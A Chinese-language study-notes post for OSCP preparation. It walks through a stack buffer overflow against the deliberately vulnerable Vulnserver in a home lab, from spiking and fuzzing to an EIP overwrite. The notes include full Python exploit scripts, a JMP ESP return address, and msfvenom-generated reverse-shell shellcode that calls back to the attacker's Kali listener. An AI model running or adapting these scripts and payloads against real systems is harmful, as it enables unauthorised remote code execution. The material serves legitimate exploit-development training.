Buffer Overflows Made Easy 學習筆記(OSCP Preparation)

因為近期開始在準備OSCP認證，那OSCP當中會有一題是Buffer Overflow的。看了許多國內外的OSCP準備心得，對於Buffer Overflow的部分很多人都有推薦要看The Cyber Mentor的Youtube教學影片「Buffer Overflows Made Easy」。前陣子有看完並且跟著做了一遍，覺得真的是教得很好，當下也算是滿順手的，不過也怕時間一久就全部都忘光光，畢竟平常根本會有機會去打Buffer Overflows的漏洞，就算有，也是又別人寫好的現成的exploits之類。所以就筆記下來希望之後可以幫助自己回想學習的過程。

Buffer Overflows Made Easy

影片連結
https://www.youtube.com/watch?v=qSnPayW6F7U&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G

總共分八部影片

Part 1: Introduction

簡單了解一下架構

整個利用的流程

1. Spiking
2. Fuzzing
3. Finding the Offset
4. Overwriting the EIP
5. Finding Bad Characters
6. Finding the Right Module
7. Generating Shellcode
8. Root!

需要準備的工具

1. Victim Machine: Windows 10
2. Vulnerable Software: Vulnserver
3. Attacker Machine: Kali Linux
4. Debugger: Immunity Debugger

接著就稍微說明一下我的環境建立

我的攻擊機與受害機接著使用虛擬機(VM)

我用的是VMware Workstation 15 Pro

受害機是64位元的Win10 (版本1909 OS組建18363.657)
攻擊機是64位元的Kali Linux (kali-linux-2019.3-amd64.iso)
http://old.kali.org/kali-images/kali-2019.3/

兩台虛擬機起好之後，在win10當中下載Vulnserver與Immunity Debugger

Vulnserver載點：
https://github.com/stephenbradshaw/vulnserver
直接用Github下載ZIP檔，解壓縮後執行EXE的檔案就可以了。

Immunity Debugger載點：
https://www.immunityinc.com/products/debugger/
直接下載安裝就可，下載前會詢問一些資料，隨便填填就可以，
安裝前會詢問python 2.7，若沒有的話，繼續安裝，最後它也會幫你安裝好。

準備好環境之後，先確認一下兩台機器都有拿到IP，
然後把Win10的防火牆跟Windows Defender都停用。
確認一下兩台機器之間通訊正常，可以互Ping確認看看。

Part 2: Spiking

右鍵點選vulnserver，使用管理員的權限執行。

Immunity Debugger也一樣，使用管理員的權限執行。

執行後Debugger後，點選左上角的File選擇Attach，
Attach可以讓我們對運行中的程式Debug，
選擇我們開啟的vulnserver，按下Attach。

這邊應該會看到以下的畫面：

這時候右下角應該是顯示Paused，
我們待會在debug過程，因為是要讓程式正常執行，
所以可以按下紅色開始圖示，讓右下角顯示成Running。

如果上面過程沒有找到vulnserver，
可以要確認一下是否vulnserver跟Debugger是否都有用管理員權限執行。

補充一下，Debugger開起來後看到的預設Layout其實就是View下面的CUP。
所以假設你的視窗跑掉了，譬如像是以下這樣：

可以點View->CPU(或是快捷鍵Alt+C)，再把這個視窗放大最大即可。

當環境都準備好可以正常執行之後，就開始第一個步驟是要來Spiking。
我們先利用Kali連線過去看看vulnserver是否正常。

nc -nv 192.168.240.180 9999

成功的話會顯示如下的畫面，可以輸入HELP查看有甚麼指令。

我的虛擬機IP如下：
Attacker Kali: 192.168.240.128
Victim Win10: 192.168.240.180
(練習的時候請記得改成自己的IP)

Spiking的用意就是去戳戳看，程式會不會崩潰(crash)，
看看有沒有存在Buffer Overflow的漏洞。

我們利用到Kali內建舊有的generic_send_tcp，
直接輸入generic_send_tcp可以看到使用方法：

可以參數中有需要spike_script，
這邊針對兩個指令來構造腳本，分別是STATS跟TRUN兩個指令。

stats.spk

s_readline();
s_string("STATS ");
s_string_variable("0");

trun.spk

s_readline();
s_string("TRUN ");
s_string_variable("0");

執行下面的指令

generic_send_tcp 192.168.240.180 9999 stats.spk 0 0

可以發現正常連線，vulnserver也正常執行，
接著改用trun.spk去執行，發現沒多久程式就crash了，
可以在debugger的右下角發現程式paused，
並且右上左上畫面都可以看到許多41414141，也就是AAAA。

所以我們第一步先觀察出了，vulnserver的TRUN當中存在Buffer Overflow的問題。

Part 3: Fuzzing

第二步Fuzzing的用意是我們要知道，要發送多少個字串才會導致Buffer Overflow。

我們寫一個python的簡易腳本，第一次連線在TRUN指令後發送100個A，
之後每次連線都在後面多增加100個A，直到程式crash，
這樣我們就可以知道需要個Buffer才會造成程式Crash。

1.py

import sys, socket
from time import sleep
buf = "A" * 100
while True:
	try:
		s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		s.connect(('192.168.240.180',9999))
		s.send(('TRUN /.:/' + buf))
		s.close
		sleep(1)
		print "Fuzzing now is %s bytes" % str(len(buf))
		buf = buf + "A"*100
				
	except:
		print "Fuzzing crashed at %s bytes" % str(len(buf))
		sys.exit()

接下來我們要找到特定的EIP的位置，
因為我們要想辦法控制EIP的值，
所以接下來最重要的就是找到EIP覆蓋的位置。

Part 4: Finding the Offset

剛剛有提到我們要找到如何控制EIP，
所以我們要知道說EIP之前有多少個buffer，
EIP之前需要多少個buffer，也就是我們所謂的offset。

因為剛剛測試差不多2700 bytes就會Crash，
我們利用Kali的內建工具來產生一個周期性的字串，
幫助我們去找到offset的位置，

利用以下指令產生3000個字串，

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

把產生的payload複製下來貼到腳本 2.py

2.py

#!/usr/bin/python
import sys, socket
offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"
try:
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('192.168.240.180',9999))
	s.send(('TRUN /.:/' + offset))
	s.close
			
except:
	print "Error Connect"
	sys.exit()

首先確認程式crash了，debugger的右下角發現程式paused，
我們來注意一下EIP的值，是386F4337

我們可以利用Kali的內建工具來找到offset的值是多少，
輸入以下

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337

其中-l就是我們剛剛產生的數量 -q是要查詢的內容

所以我們就知道offset的值是2003，
也就是說2003個offset內容之後的4個bytes會覆蓋EIP的值。

補充一下
假設產生的payload -l 20，
所以payload可能會長得如下
1A2B3C4D5E7Co8654321
(總共20bytes)

送出後得到的EIP是386F4337
總共4bytes
Hex to ASCII就是8oC7

offset算出來是10
表示產生的payload
扣除前面十個
第11個開始就會是EIP的位置

Part 5: Overwriting the EIP

知道了offset的數量之後，其實我們就有辦法覆蓋EIP的值了，
這部分就是用3.py，確定一下是有真的覆蓋在EIP上面。
影片中是用BBBB啦，我的腳本是用BCDE確認有hit中EIP的值。

3.py

#!/usr/bin/python
import sys, socket
shellcode = "A" * 2003 + "BCDE"
try:
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('192.168.240.180',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close
			
except:
	print "Error Connect"
	sys.exit()

可以看到EIP的值就是45444342，剛好就是EDCB，
所以我們現在可以控制EIP的值了。

可能有人會好奇會甚麼輸入明明是BCDE，
可是EIP的值卻是EDCB，其實是因為Little-Endian的緣故，
關於Little-Endian這邊就不多說明了，有興趣可以自己搜尋看看。

補充一下，如果覺得debugger字太小想放大一些，
可以用Appearance->Font(all)->OEM fixed fond，
或是其他自己喜歡的、習慣的字型來看。

Part 6: Finding Bad Characters

下一個步驟是要找到Bad Characters，
其實為了之後要注入Shellcode做準備，
我們要看看有哪些字串是這個程式不吃的，
如果說這個字串不能正常在程式當中執行(也就是Bad Chars)，
我們就要先記下來，避免之後產生的shellcode有這個Bad Chars。

找到Bad Characters，可以利用一下以下的資源，
把badchars複製貼上到我們的4.py
https://github.com/cytopia/badchars

4.py

#!/usr/bin/python
import sys, socket
badchars = (
  "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
shellcode = "A" * 2003 + "BCDE" + badchars
try:
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('192.168.240.180',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close
			
except:
	print "Error Connect"
	sys.exit()

發送之後，因為badchars的payload在EIP之後，
點選ESP的值，選擇Follow in Dump，
可以看到左下角，就會顯示ESP位置內容，
這一大串就是我們發送過去的badchars的payload。

不過vulnserver當中並沒有bad char，
看不出甚麼鬼XD
下面圖是一個存在bad char的範例

Part 7: Finding the Right Module

接著我們要找到一個Right Module，
何謂Right Module呢？
就是一個沒有保護機制的Module，
我們可以利用mona來協助我們找到，將mona.py放到以下位置。

C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands

https://github.com/corelan/mona

在Debugger下方的框框中輸入

!mona modules

這邊可以看到第一個essfunc.dll沒有用到任何的保護機制，
每個保護機制都寫False，正好是我們需要的。

接著就有點特別了，我們要找到essfunc.dll當中，
組合語言具有JMP ESP的位置，
因為如果我們能將EIP的值這個位置上，那就會Jump到ESP上，
我們只要將Shellcode寫在ESP上，就可以成功執行shellcode。

所以我們先用Kali內建的工具，來找到JMP ESP的Hex是甚麼：

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb

所以我們知道我們要找到的FFE4，
在Debugger下方的框框中輸入

!mona find -s "\xff\xe4" -m essfunc.dll

結果顯示成功找到了9個，所以我們就用第一個625011af，
我們將EIP的值覆蓋成625011af，記得要用Little-Endian。

5.py

#!/usr/bin/python
import sys, socket
from time import sleep
# FF E4 (JMP ESP) position 625011af
shellcode = "A" * 2003 + "\xaf\x11\x50\x62"
try:
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('192.168.240.180',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close
			
except:
	print "Error Connect"
	sys.exit()

不過要記得執行前先到Debugger，
在 625011AF 的位置先按F2，就是設定break point，
不然./5.py執行之後，EIP指到那個位置就會 JMP ESP
這樣我們沒辦法確定是否有真的將EIP 指到 625011AF。

按下F2之後，會被Highlight起來：

執行完後，可以確定EIP的值為625011AF

Part 8: Generating Shellcode and Gaining Shells

最後就是我們要在ESP的地方注入Shellcode，
首先我們要先產生Shellcode，執行以下指令：

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.240.128 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"

IP跟Port記得更換成自己要監聽的IP跟Port。

在攻擊機監聽，輸入以下指令：

nc -nvlp 4444

執行以下腳本
6.py

#!/usr/bin/python
import sys, socket
overflow = (
"\xdb\xd3\xd9\x74\x24\xf4\x5f\x33\xc9\xb1\x52\xbd\xcc\x3d\x38"
"\xe7\x31\x6f\x17\x03\x6f\x17\x83\x23\xc1\xda\x12\x47\xd2\x99"
"\xdd\xb7\x23\xfe\x54\x52\x12\x3e\x02\x17\x05\x8e\x40\x75\xaa"
"\x65\x04\x6d\x39\x0b\x81\x82\x8a\xa6\xf7\xad\x0b\x9a\xc4\xac"
"\x8f\xe1\x18\x0e\xb1\x29\x6d\x4f\xf6\x54\x9c\x1d\xaf\x13\x33"
"\xb1\xc4\x6e\x88\x3a\x96\x7f\x88\xdf\x6f\x81\xb9\x4e\xfb\xd8"
"\x19\x71\x28\x51\x10\x69\x2d\x5c\xea\x02\x85\x2a\xed\xc2\xd7"
"\xd3\x42\x2b\xd8\x21\x9a\x6c\xdf\xd9\xe9\x84\x23\x67\xea\x53"
"\x59\xb3\x7f\x47\xf9\x30\x27\xa3\xfb\x95\xbe\x20\xf7\x52\xb4"
"\x6e\x14\x64\x19\x05\x20\xed\x9c\xc9\xa0\xb5\xba\xcd\xe9\x6e"
"\xa2\x54\x54\xc0\xdb\x86\x37\xbd\x79\xcd\xda\xaa\xf3\x8c\xb2"
"\x1f\x3e\x2e\x43\x08\x49\x5d\x71\x97\xe1\xc9\x39\x50\x2c\x0e"
"\x3d\x4b\x88\x80\xc0\x74\xe9\x89\x06\x20\xb9\xa1\xaf\x49\x52"
"\x31\x4f\x9c\xf5\x61\xff\x4f\xb6\xd1\xbf\x3f\x5e\x3b\x30\x1f"
"\x7e\x44\x9a\x08\x15\xbf\x4d\xf7\x42\x4f\x0d\x9f\x90\xaf\x1f"
"\x3c\x1c\x49\x75\xac\x48\xc2\xe2\x55\xd1\x98\x93\x9a\xcf\xe5"
"\x94\x11\xfc\x1a\x5a\xd2\x89\x08\x0b\x12\xc4\x72\x9a\x2d\xf2"
"\x1a\x40\xbf\x99\xda\x0f\xdc\x35\x8d\x58\x12\x4c\x5b\x75\x0d"
"\xe6\x79\x84\xcb\xc1\x39\x53\x28\xcf\xc0\x16\x14\xeb\xd2\xee"
"\x95\xb7\x86\xbe\xc3\x61\x70\x79\xba\xc3\x2a\xd3\x11\x8a\xba"
"\xa2\x59\x0d\xbc\xaa\xb7\xfb\x20\x1a\x6e\xba\x5f\x93\xe6\x4a"
"\x18\xc9\x96\xb5\xf3\x49\xb6\x57\xd1\xa7\x5f\xce\xb0\x05\x02"
"\xf1\x6f\x49\x3b\x72\x85\x32\xb8\x6a\xec\x37\x84\x2c\x1d\x4a"
"\x95\xd8\x21\xf9\x96\xc8"
)
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow
try:
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('192.168.240.180',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close
			
except:
	print "Error Connect"
	sys.exit()

腳本中的x90 * 32是為了padding用途，
成功取得reverse shell。